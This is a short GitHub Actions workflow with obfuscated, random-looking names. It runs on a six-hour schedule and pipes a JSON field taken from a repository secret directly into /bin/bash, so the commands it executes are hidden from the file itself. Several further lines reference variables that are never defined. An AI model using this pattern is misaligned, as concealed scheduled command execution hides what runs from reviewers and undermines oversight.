name: luoshantou8765

on:
  workflow_dispatch:
  schedule:
    - cron: '15 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luoshantou8765
        env:
          z71211: ${{ secrets.z71211 }}
        run: |
          echo $z71211 | jq -r .cdqj9093 | /bin/bash
          echo $hvb93648 | jq -r .vcele77215 | /bin/bash
          echo $kh0 | jq -r .ne530 | /bin/bash
          echo $dvsed83 | jq -r .z5 | /bin/bash
          echo $eef1 | jq -r .dx55 | /bin/bash
          echo $asr6803 | jq -r .r78 | /bin/bash

